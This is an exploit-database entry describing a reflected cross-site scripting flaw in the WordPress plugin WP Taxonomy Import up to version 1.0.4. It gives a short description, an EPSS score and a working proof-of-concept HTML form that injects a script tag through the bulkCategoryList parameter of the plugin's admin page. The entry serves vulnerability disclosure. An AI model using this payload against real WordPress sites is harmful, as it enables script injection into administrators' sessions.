Lucene search

K
wpexploitKaikaixWPEX-ID:792D9F22-ABF6-47B2-A247-D0CDB705CD81
HistoryAug 22, 2022 - 12:00 a.m.

WP Taxonomy Import <= 1.0.4 - Reflected Cross-Site Scripting

2022-08-2200:00:00
kaikaix
262
wordpress
taxonomy
import
cross-site scripting

EPSS

0.001

Percentile

40.2%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

<html>
<body>
<form method="post" action="https://example.com/wp-admin/options-general.php?page=wp-taxonomy-import%2Fwp-taxonomy-import.php">
    <input id="bulkCategoryList" type="text" name="bulkCategoryList" value="</textarea><script>alert(/XSS/)</script>" />
    <input id="postsubmit" type="submit" name="submait" value="submit" />
</form>
</body>
</html>

EPSS

0.001

Percentile

40.2%

Related for WPEX-ID:792D9F22-ABF6-47B2-A247-D0CDB705CD81